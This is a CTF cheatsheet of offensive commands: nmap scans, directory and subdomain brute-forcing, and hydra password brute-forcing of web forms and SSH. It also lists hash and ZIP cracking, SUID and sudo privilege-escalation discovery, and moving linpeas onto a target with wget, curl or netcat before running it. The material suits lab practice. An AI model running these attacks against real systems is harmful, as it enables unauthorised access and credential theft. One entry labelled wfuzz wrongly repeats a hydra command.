Use these cheatsheets to increase your CTF speed.
This cheatsheet contains essential commands I always use in CTFs, THM boxes, and in cybersecurity. Includes commands and tools for discovery to transferring files, passing by web tools, and cracking. I encourage the other content creators to replicate this kind of cheatsheet on their platform (a mention will always be appreciated 😊).
Discovery
Nmap
Basic nmap scan:
nmap -vv -sC -sV -oN nmap.log $IP
Complete nmap scan:
nmap -vv -A -p- -oN nmap-complete.log $IP
See my nmap cheatsheet for other personal favorites.
Web Directory and Query Parameters Bruteforce
Using gobuster:
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuster.log -t 200 -u $URL
Using wfuzz:
wfuzz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 --hc 404 http://www.host.name/FUZZ
Using wfuzz to bruteforce query parameters:
wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 --hc 404 http://www.host.name/?parameter=FUZZ
Recursive directory scan with wfuzz:
wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 200 --hc 404 -R $DEPTH http://www.host.name/FUZZ
Web
HTTP Form Bruteforce
Using Hydra:
hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "<Login Page>:<Request Body>:<Error Message>"
Using wfuzz:
hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "<Login Page>:<Request Body>:<Error Message>"
Wordpress
WPScan + password bruteforce:
wpscan --url $URL --passwords /usr/share/wordlists/rockyou.txt --usernames usernames.txt
Subdomain Bruteforce
Using wfuzz:
wfuzz -c -f wfuzz-sub.log -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u $URL -H "Host: FUZZ.host.name" -t 32 --hc 200 --hw 356
Note: you will need to adjust the --hc
and --hw
parameters to your needs. Check wfuzz -h
for more information about those.
Using gobuster:
gobuster vhost -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $URL -t 32
Cracking
ZIP
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip
Hashes
Using hashcat:
hashcat -m $MODE hashes /usr/share/wordlists/rockyou.txt
Bruteforce SSH
Using hydra:
hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -t 4 ssh
Steganography
Crack steghide passphrase using stegracker: Install:
pip3 install stegcracker
Run:
python3 -m stegcracker tocrack.jpg
Privescs Discovery
Find privescs exploiting SUID binaries:
find / -perm -u=s -type f 2>/dev/null
Find privescs by listing sudo permissions:
sudo -l
Enumerate interesting files, processes, and privescs using Linpeas:
- Install linpeas on your machine.
- Transfer it to the target machine. (see the Transferring Files)
- Make it executable, run it, and
tee
the output to a log file for further analysis.
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.log
Transferring Files
Open an HTTP server:
cd
into the directory you want to access one or more files from.- Open an HTTP server:
# PYTHON3
python3 -m http.server -b $IP $PORT
# PHP
php -S $IP:$PORT
- Access the file:
# Wget
wget http://$IP:$PORT/file
# Curl
curl http://$IP:$PORT/file -o target_file
# Netcat
nc $IP $PORT > target_file
Using SCP:
# Send
scp /path/to/file user@$HOST:/path/
# Send with custom name
scp /path/to/file user@$HOST:/path/different_name
# Get
scp user@$HOST:/path/to/file /local/directory
Note: To connect with an SSH key, you may need to use the -i
flag followed by the path to the key.
Using netcat:
# Server
nc -lp $PORT < file
# Client
nc $IP $PORT > file